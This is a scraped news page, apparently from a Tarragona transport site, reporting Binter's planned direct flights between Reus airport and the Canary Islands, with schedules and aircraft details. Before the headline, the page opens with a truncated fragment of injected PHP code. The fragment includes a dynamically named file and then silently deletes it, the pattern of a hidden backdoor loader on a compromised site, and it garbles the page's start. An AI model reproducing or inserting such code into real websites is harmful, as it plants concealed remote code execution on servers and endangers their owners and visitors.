");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> La companyia Binter connectarà l'aeroport de Reus amb Canàries a partir del juliol
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

La companyia Binter connectarà l'aeroport de Reus amb Canàries a partir del juliol (09/04/2021)

Binter empezará a operar vuelos directos regulares desde Tarragona a Canarias a partir del próximo mes de julio, coincidiendo con la temporada de verano. Desde la aerolínea celebran la apertura de esta nueva ruta directa y regular que permitirá ampliar la conectividad y contribuir a la recuperación turística de ambos territorios,

Los vuelos desde Tarragona hacia Canarias se operarán los jueves y domingos a través de Gran Canaria, si bien la aerolínea ofrece la ventaja de que se pueda viajar como destino final, sin coste adicional, a cualquiera de las islas Canarias, al poder hacer el salto interinsular sin coste en el caso de los vuelos en conexión, aprovechando los 170 vuelos diarios interinsulares que la aerolínea opera entre las islas.

Todos los jueves, un avión saldrá desde el Aeropuerto de Gran Canaria a las 07.00 horas, para aterrizar en Tarragona a las 11.20 horas. Cuarenta minutos después, a las 12.00 horas, el vuelo despegará del Aeropuerto de Reus hacia Canarias, aterrizando a las 14.20 en el Archipiélago.

Los domingos saldrá un vuelo desde Canarias a las 16.00 horas, y aterrizará en el Aeropuerto de Reus a las 20.20 horas. De allí, partirá a las 21.00 horas, y tomará tierra en las Islas a las 23.20 horas.

Los pasajeros de esta nueva ruta disfrutarán de las ventajas diferenciales del producto que ofrece Binter: el confort de sus nuevos aviones Embraer E195-E2 -el reactor de pasillo único más silencioso, limpio y eficiente de su clase, con una configuración que permite más espacio entre filas y la comodidad de no tener asiento de en medio-, a lo que se suma un servicio a bordo de alta gama, con amplias prestaciones para todos los pasajeros que incluye un catering de cortesía durante el trayecto.

Fuente: Binter

La companyia Binter connectarà l'aeroport de Reus amb Canàries a partir del juliol

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona